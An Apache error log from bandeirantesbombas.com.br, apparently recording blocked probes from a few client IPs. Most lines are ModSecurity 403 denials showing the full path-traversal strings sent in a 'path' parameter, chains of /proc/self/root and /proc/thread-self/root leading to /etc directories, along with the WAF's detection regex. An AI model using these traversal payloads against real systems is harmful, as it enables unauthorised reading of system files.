[Wed Mar 18 10:28:48.667495 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:45976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqokAkwaGbbGflqUZANIAAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:51.436929 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.243.128:46104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqok-w_le52K8_3pV3chgAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:52.759710 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:46114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqolOoXxyEfFpUF8f9rDgAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:58.490202 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:46126] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqomgkwaGbbGflqUZANKgAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:29:01.927850 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.241.31:40188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqonSmAPhZkrhU8w4lp3AAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:29:07.004446 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:56422] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoo9Y0UrI5A3LftIykHgAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:29:08.339309 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:56432] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqopMdf6f5d65gmYZTShgAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:29:13.079292 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:52170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoqQkwaGbbGflqUZANQQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:29:23.715255 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:52182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqos8df6f5d65gmYZTSkAAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:29:25.801237 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:55878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqotcdf6f5d65gmYZTSkQAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:29:28.588893 2026] [mime_magic:error] [pid 19507:tid 140411557287680] (70014)End of file found: [client 74.7.241.31:50782] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run
[Wed Mar 18 10:30:12.969866 2026] [mime_magic:error] [pid 17653:tid 140411548894976] (70014)End of file found: [client 57.141.18.83:54650] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:30:20.495613 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:55894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqo7AkwaGbbGflqUZANjQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:30:23.097764 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:59548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqo7_u8EFLIOrSqIpsBowAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:30:29.740095 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:59548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqo9fu8EFLIOrSqIpsBqwAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:30:33.355329 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:56966] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqo-dY0UrI5A3LftIykcgAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:30:33.900564 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:56966] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqo-dY0UrI5A3LftIykdQAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:30:36.315352 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:56980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqo_OyqAr6etmhZHNq8zgAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:30:39.089226 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:56982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqo_ymAPhZkrhU8w4lqHwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:30:40.435726 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:58654] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqpAMdf6f5d65gmYZTSygAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:30:41.716637 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:58656] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqpAeyqAr6etmhZHNq80QAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:30:43.580376 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:58660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqpA_u8EFLIOrSqIpsBsAAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:30:44.568868 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:49116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqpBNa6ubjKNq_cu4aWvgAAA1A"], referer: 